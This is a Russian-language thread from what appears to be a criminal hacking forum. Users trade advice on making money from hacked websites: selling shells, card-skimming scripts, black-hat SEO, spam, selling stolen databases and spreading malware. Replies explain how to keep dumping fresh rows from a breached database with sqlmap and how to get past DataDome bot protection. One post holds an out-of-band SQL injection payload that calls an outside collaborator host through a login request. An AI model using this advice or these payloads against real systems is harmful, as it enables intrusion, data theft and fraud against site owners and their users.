• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Как сейчас монетизируют веб-пентест и просто пентест в целом?
Последний раз занимался 4 года назад и в приоритете были:
  • продажа шелла на взломанном сайте;
  • установка связки эксплоитов;
  • установка скриптов бирж ссылок и т.д.;
  • черное SEO;
  • продажа информации (БД).
Сейчас слышал про майнинг на веб-ресурсах, но как по мне такое себе.
Если есть какие-то ресурсы где монетизируют такой способ деятельности, поделитесь)
 
Как сейчас монетизируют веб-пентест и просто пентест в целом?
Последний раз занимался 4 года назад и в приоритете были:
  • продажа шелла на взломанном сайте;
  • установка связки эксплоитов;
  • установка скриптов бирж ссылок и т.д.;
  • черное SEO;
  • продажа информации (БД).
Сейчас слышал про майнинг на веб-ресурсах, но как по мне такое себе.
Если есть какие-то ресурсы где монетизируют такой способ деятельности, поделитесь)
.js-снифферы карт до сих пор худо-бедно живут. Массово шеллы сейчас больше используют для спама, чем для СЕО, или спам-редиректов. Но черное СЕО никуда не делось, просто все стало несколько сложнее и недостаточно просто залить дор на пирог и подняться по запросу. Если ты будешь внимательным, то заметишь, что до сих пор шеллы под СЕО скупают пара людей. Можешь попробовать спалить, что конкретно они делают (но я думаю, если это что-то завязано на переливе веса через редиректы для конкретных ссылок, с которых уже что-то и куда-то прыгает, то хрен ты чего спалишь). Связки сплойтов умерли уже больше, чем 5 лет назад, с момента смерти флэш-плагинов в браузерах и введения песочницы (ну и арестов основных игроков). По продаже информации - все стало тоже сложнее, так как с начала рэнсома появились гигабайты бесплатного стаффа, что релизится ежедневно :) Но, скажем, емейл-базы по жирным тематикам типа финансов до сих пор могут принести хороший профит (т.е. их купят).

Как-то так.
 
Майнинг на вебресурсах мертвый. Тема задроченная, ты скорей шеллы ей убьешь.
Про связки тебе уже написали.

А так спам, доры, шопы под сниф, слив трафика, установка своей рекламы.

Ты где пропадал много лет?) Заметно, что лет на 5-10 выпадал из блека) Сейчас так прям в лоб мало что работает. Если траф сливать, нужно клоачить, по дорам братва слишком краски сгущает, но да, тоже не так как раньше, залил текстову и оно вылезло. Ну а если продавать - так продавай, есть тут и на экспе темы тех, кто покупает шеллы или оптом включая все нулевки, или по показателям уже за более вменяемые деньги. Ну и шопы отдельно. Их хорошо берут и за них хорошо платят.

По теме БД - берут базы коммерческих тематик, но не за самые большие деньги, разве что кроме крипты. За БД по крипте неотработанную платят хорошо. Вообще весь блек сейчас вращается вокруг крипты и рансома по сути.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Подскажите пожалуйста
Есть в бд таблица с 100к строк, как мне в sqlmap получать свежие записи? --fresh-queries начинает дампить заново
там явно есть колонка data, id или чтото типо этого. К примеру к каждой строке идет колонка id (1,2,3,4,....)
посмотри id последней строки, можно также удобно через where (where="id>100000 введи и выйдут +- последние строки)
и уже дальше когда сдампил 100000 строк и нужны свежие, дампишь --where="id > 100000)
когда сдампил 100100 строк, т.е 100 новых и хочешь новые, дампишь с --where-"id > 100100)
с датой аналогично также через --where + between юзаешь и дампишь за нужные даты
вообщем почитай про --where
 
Подскажите пожалуйста
Есть в бд таблица с 100к строк, как мне в sqlmap получать свежие записи? --fresh-queries начинает дампить заново
-D db_name -T table_name --dump --start=99500

99500 - номер строки с которой начнется дамп.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
С учетом всех плюсов и минусов в нынешних реалиях, рентабельно ли распространять малварь через контролируемые ресурсы?
 
Есть кто встречал и обходил datadome бот-протекш на сайте? Задача парсить шоп, бот-протекш бросает 403 почти в любом случае. Частично помогло менять TLS фингерпринт для курла, но после 500-1000 запросов прокси улетают в бан. Возможно есть у кого какие-то еще идеи?
 
С учетом всех плюсов и минусов в нынешних реалиях, рентабельно ли распространять малварь через контролируемые ресурсы?
Если какая то fileless малварь которую долго не будут детектить, то может быть.
А если стилак в зип архиве, ну хз
 
Поддомен на нужном таргет был только www.
Посмотри историю домена, возвожно что-то там найдёшь.
Попробуй зарегистрироваться на сайте и если придёт письмо с сайта, смотри айпишник с которого оно пришло, если это на какой-нибудь mailchimp то скорее smtp стоит на том же хосте что и таргет.
 
Ну и вот попробуй. тут из форумчан кто-то выкладывал. я списочек этот себе сохранил
Код:
http://ipv4info.com/
https://dehashed.com/
https://passivedns.mnemonic.no/
https://dnshistory.org/dns-records/
https://asn.cymru.com/
https://hackertarget.com/reverse-dns-lookup/
https://buckets.grayhatwarfare.com/
https://osint.sh/buckets/
http://filesearch.link/
https://www.filechef.com/
https://www.4shared.com/
http://insecam.org/
maltiverse.com/search
http://codefinder.org/
https://threatminer.org/
https://traceroute-online.com/
netograph.io
https://analyze.intezer.com/sign-in
https://natlas.io/
https://app.any.run/
https://github.com/Quikko/Recon-Methodology
https://dnshistory.org/
https://www.crunchbase.com/
https://builtwith.com
https://www.robtex.com
https://scamalytics.com/
https://censys.io/
https://www.shodan.io/
https://viz.greynoise.io/
https://onyphe.io/
https://app.binaryedge.io/login
https://hunter.io/
https://wigle.net/
https://ghostproject.[[https://ghostproject.fr/|fr/]]
https://grep.app/
https://snov.io/
https://crt.sh/
https://ahmia.fi/
https://fofa.so/
https://intelx.io/
https://www.website.ws
https://ivre.rocks/
https://viz.greynoise.io/
https://www.onyphe.io/
https://community.riskiq.com/
https://publicwww.com/
https://pipl.com/
https://osintframework.com/
http://ixss.warsong.pw/xssor/
https://bgp.he.net/
http://asnlookup.com/
https://bgp.tools/
https://webmagellan.com/explore/paypal.com
https://spyse.com/
https://myip.ms
https://www.searchftps.net/
https://www.nerdydata.com/
https://analyzeid.com/
https://threatcrowd.org/
https://offshoreleaks.icij.org/nodes/11009484
https://urlscan.io/
https://passivedns.mnemonic.no/
https://dns.coffee/domains
https://www.[[https://www.robtex.com/dns-lookup/sberbank.ru|robtex]][[.com/dns-lookup/paypal.com]]
https://threatminer.org/domain.php?q=google.com#gsc.tab=0&gsc.q=google.com&gsc.page=1
https://manytools.org/network/query-dns-records-online/
https://otx.alienvault.com/indicator/hostname/www.paypal.com
https://ipinfo.io/
https://spyse.com/
https://dorks.faisalahmed.me/
http://ipv4info.com/
https://en.52wmb.com/
https://ddosecrets.com/wiki/Distributed_Denial_of_Secrets
https://graphsense.info/
https://www.metadata2go.com/
https://centralops.net/co/DomainDossier.aspx
https://xss.pro/threads/52707/#post-338681
https://www.virustotal.com/gui/domain/paypal.com/relations
https://www.threatcrowd.org/domain.php?domain=sberbank.ru
https://whois.domaintools.com/
https://fccid.io/
http://dns.bufferover.run/dns?q=
https://dnsdumpster.com/
https://github.com/pownjs/recon
https://manytools.org/network/query-dns-records-online/
https://mxtoolbox.com/spf.aspx
https://securitytrails.com/domain/google.com/dns
 
Burp нашел SQLi в JSON параметре csessionid, выглядит как на скрине. В каком виде мне нужно дать этот запрос в sqlmap? пробовал сохранить весь запрос и с оригинальным параметром и с тем, который выдал burp, но безуспешно
1666642975432.png
 
Burp нашел SQLi в JSON параметре csessionid, выглядит как на скрине. В каком виде мне нужно дать этот запрос в sqlmap? пробовал сохранить весь запрос и с оригинальным параметром и с тем, который выдал burp, но безуспешноПосмотреть вложение 44533
Похоже на OOB SQLi. Через SQLMap DNS Collaborator (расширение в бурпе) можно крутануть. Сам запрос покажи, замажь там все что надо предварительно.
 
Похоже на OOB SQLi. Через SQLMap DNS Collaborator (расширение в бурпе) можно крутануть. Сам запрос покажи, замажь там все что надо предварительно.
POST /api/user/login_in HTTP/2
Host: test.com
Accept: application/json, text/plain, */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Origin: https://test.com
Referer: https://test.com/en_US/login


{"verificationType":"1","csessionid":""(select load_file('\\\\\\\\test.oastify.com\\\\eiy'))"","sig":"*sig","token":"*token","scene":"other","nc":null,"email":"test@mail.com","loginPword":"password","uaTime":"2012-12-11 11:42:13","securityInfo":"*mnogo-teksta"}
 
POST /api/user/login_in HTTP/2
Host: test.com
Accept: application/json, text/plain, */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Origin: https://test.com
Referer: https://test.com/en_US/login


{"verificationType":"1","csessionid":""(select load_file('\\\\\\\\test.oastify.com\\\\eiy'))"","sig":"*sig","token":"*token","scene":"other","nc":null,"email":"test@mail.com","loginPword":"password","uaTime":"2012-12-11 11:42:13","securityInfo":"*mnogo-teksta"}
Полный линк вставлял в запрос? Вместо POST /api/user/login_in HTTP/2 сделать POST https://test.com/api/user/login_in HTTP/1.1
Уязвимый параметр как обычно отметить звездой, либо оригинальным значением со звездой.
 
Полный линк вставлял в запрос? Вместо POST /api/user/login_in HTTP/2 сделать POST https://test.com/api/user/login_in HTTP/1.1
Уязвимый параметр как обычно отметить звездой, либо оригинальным значением со звездой.
спасибо, сейчас попробую
 
Есть SQLi, версия MariaDB 10.4.20, MySQL 5, есть какие-то варианты повысить привелегии? Гуглил, да. Но не могу найти privilege escalation через SQLi, а то что нахожу, без публичного эксплойта
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх